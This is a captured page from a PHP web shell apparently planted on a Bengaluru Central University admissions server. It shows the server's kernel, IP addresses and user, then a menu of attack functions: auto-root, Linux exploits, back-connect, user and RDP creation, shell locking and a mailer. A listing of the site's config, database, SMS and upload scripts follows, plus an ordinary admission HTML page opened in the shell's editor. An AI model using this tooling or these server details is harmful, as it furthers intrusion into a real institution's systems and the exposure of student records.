Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.37.211
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
PrathibhaKaranji_stop /
[ HOME SHELL ]
Name
Size
Permission
Action
PHPExcel-1.8
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
dompdf
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
BU_connect.php
442
B
-rwxr-xr-x
MainPage.html
29.86
KB
-rwxr-xr-x
MainPage_dev.html
36.76
KB
-rwxr-xr-x
admission_sms_push.php
2.42
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.49
KB
-rwxr-xr-x
cronjob_sendsms.php
2.52
KB
-rwxr-xr-x
database.php
445
B
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
forgotPassword.html
3.84
KB
-rwxr-xr-x
index.html
5.68
KB
-rwxr-xr-x
index_1.html
3.92
KB
-rwxr-xr-x
instruction.html
4
KB
-rwxr-xr-x
instruction_10092018.html
8.37
KB
-rwxr-xr-x
instruction_24092018.html
9.08
KB
-rwxr-xr-x
instruction_regn.html
5.07
KB
-rwxr-xr-x
login.php
235
B
-rwxr-xr-x
pg-forgotPassword.html
4.1
KB
-rwxr-xr-x
pg-sign-up.html
7.15
KB
-rwxr-xr-x
pgResponse.php
7.77
KB
-rwxr-xr-x
pgStudStatus.html
4.32
KB
-rwxr-xr-x
pg_instruction.html
8.53
KB
-rwxr-xr-x
pgadm.html
111.5
KB
-rwxr-xr-x
resetpassword.php
697
B
-rwxr-xr-x
sendGridMail.php
1.28
KB
-rwxr-xr-x
sendMobEmailOTP.php
1.39
KB
-rwxr-xr-x
sendsmsapi.php
760
B
-rwxr-xr-x
sign-up.html
7.16
KB
-rwxr-xr-x
signin.php
796
B
-rwxr-xr-x
signup.php
974
B
-rwxr-xr-x
sumexeclreport.php
6.17
KB
-rwxr-xr-x
support.html
5.37
KB
-rwxr-xr-x
upload.php
415
B
-rwxr-xr-x
upload1.php
423
B
-rwxr-xr-x
upload_file.php
813
B
-rwxr-xr-x
upload_file_pg.php
740
B
-rwxr-xr-x
validateRegno.php
1.79
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : instruction_24092018.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> <title>BCU: Bengaluru Central University</title> <!-- Favicon--> <link rel="icon" href="images/favicon.jpg" type="image/x-icon"> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600,700,800&subset=latin-ext" rel="stylesheet"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css"> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap_adm.css" rel="stylesheet"> <!-- Waves Effect Css --> <link href="plugins/node-waves/waves.css" rel="stylesheet" /> <!-- Custom Css --> <link href="css/style_adm.css" rel="stylesheet"> <link href="plugins/sweetalert/sweetalert.css" rel="stylesheet"> <!-- AdminBSB Themes. You can choose a theme from css/themes instead of get all themes --> <link href="css/themes/all-themes.css" rel="stylesheet" /> <style type="text/css"> .feedback { background-color : #31B0D5; color: white; padding: 10px 20px; border-radius: 4px; border-color: #46b8da; } #mybutton { position: fixed; bottom: 1%; right: 10px; } * {box-sizing: border-box;} /* Button used to open the chat form - fixed at the bottom of the page */ .open-button { background-color: #555; color: white; padding: 16px 10px; border-color: #46b8da; cursor: pointer; font-size: 16px; border-radius: 4px; position: fixed; bottom: 23px; right: 28px; width: 280px; } /* The popup chat - hidden by default */ .chat-popup { display: none; position: fixed; bottom: 0; right: 15px; z-index: 9; } /* Add styles to the form container */ .chat-form-container { max-width: 350px; padding-right: 30px; background-color: white; } /* Full-width textarea */ .chat-form-container textarea { width: 100%; padding: 15px; margin: 5px 0 22px 0; border: none; background: #f1f1f1; resize: none; min-height: 200px; } /* When the textarea gets focus, do something */ .chat-form-container textarea:focus { background-color: #ddd; outline: none; } /* Set a style for the submit/send button */ .chat-form-container .btn { background-color: #4CAF50; color: white; padding: 16px 20px; border: none; cursor: pointer; width: 100%; margin-bottom:10px; opacity: 0.8; } /* Add a red background color to the cancel button */ .chat-form-container .cancel { background-color: red; } /* Add some hover effects to buttons */ .chat-form-container .btn:hover, .open-button:hover { opacity: 1; } </style> </head> <body class="theme-pink" onload="loadPerdata()"> <!-- Page Loader --> <div class="page-loader-wrapper"> <div class="loader"> <div class="preloader"> <div class="spinner-layer pl-red"> <div class="circle-clipper left"> <div class="circle"></div> </div> <div class="circle-clipper right"> <div class="circle"></div> </div> </div> </div> <p>Please wait...</p> </div> </div> <!-- #END# Page Loader --> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid" style="color: #fff;"> <div class='col-md-12 m-t--5'> <a href="#" class="links" onclick="homeLink()" style="float: right;margin-top: 15px; font-size:16px;color: #fff; ">Logout</a> <center> <h2 class="brand" style="margin-left: 50px;">Bengaluru Central University</h2> </center> <center> <h4 class="brand" style="margin-top: -4px;">Online Admission Entry</h4> </center> </div> </div> </nav> <section class="content"> <div class="row clearfix"> <div class="container-fluid"> <div class="col-lg-10 col-md-10 col-sm-12 col-xs-12"> <div class="card"> <div class="body bg-teal"> <table style="border-radius: 15px !important;border-collapse: unset;border: 1px solid #fff;padding: 10px;" id="studinfo" class="table no-border"> </table> <span id="msg" style="font-weight: 800;"> </span> <div class="row clearfix btns"> <div id="admEnt"> <a href='MainPage.html'><button type="button" class="btn btn-lg btn-default waves-effect">Admission Entry / Corrections</button></a> </div> <div> <a href='support.html'><button type="button" class="btn btn-lg btn-default waves-effect">Support</button></a> </div> <div> <a href='#'><button onclick="rePrintApplication()" type="button" class="btn btn-lg btn-default waves-effect">Print Application Form</button></a> </div> </div> </div> </div> </div> </div> </div> <!-- <div id="mybutton"> <button class="feedback">Feedback</button> </div> --> <button class="open-button btn btn-success" style="font-size: 16px;" onclick="openForm()">I Need Help</button> <div class="chat-popup" id="myForm"> <div class="chat-form-container"> <div class="row clearfix"> <div class="card" style="width:300px;"> <div class="header bg-blue"> <h2>Enter Query</h2> </div> <div class="form-group p-b-20" style="padding: 20px;"> <b>Subject <span style="color: red;">*</span></b> <div class="form-line"> <input type="text" id="fsubject" class="form-control" placeholder="Query Subject" name="Query Subject" maxlength="60" onkeypress="return charKeydown(event);" autocomplete="off"> </div> <b>Message <span style="color: red;">*</span></b> <div class="form-line"> <textarea id="fmessage" class="form-control" placeholder="Query Message" > </textarea> </div> </div> <div> <button type="submit" class="col-md-6 btn btn-success" onclick="submitquery()" >Send</button> <button type="button" class="col-md-6 btn cancel" onclick="closeForm()">Close</button> </div> </div> </div> </div> </div> </section> <script src="plugins/jquery/jquery.min.js"></script> <!-- Bootstrap Core Js --> <script src="plugins/bootstrap/js/bootstrap.js"></script> <!-- Select Plugin Js --> <script src="plugins/bootstrap-select/js/bootstrap-select.js"></script> <!-- Slimscroll Plugin Js --> <script src="plugins/jquery-slimscroll/jquery.slimscroll.js"></script> <!-- Waves Effect Plugin Js --> <script src="plugins/node-waves/waves.js"></script> <script src="js/kusPhdAdm.js?v=28" type="text/javascript"></script> <script src="js/MainPageCompressed.js"></script> <!-- Custom Js --> <script src="js/admin.js"></script> <script src="js/login.js"></script> <!-- Demo Js --> <script src="js/demo.js"></script> <script type="text/javascript"> function openForm() { document.getElementById("myForm").style.display = "block"; } function closeForm() { document.getElementById("myForm").style.display = "none"; } </script> </body> </html>
Close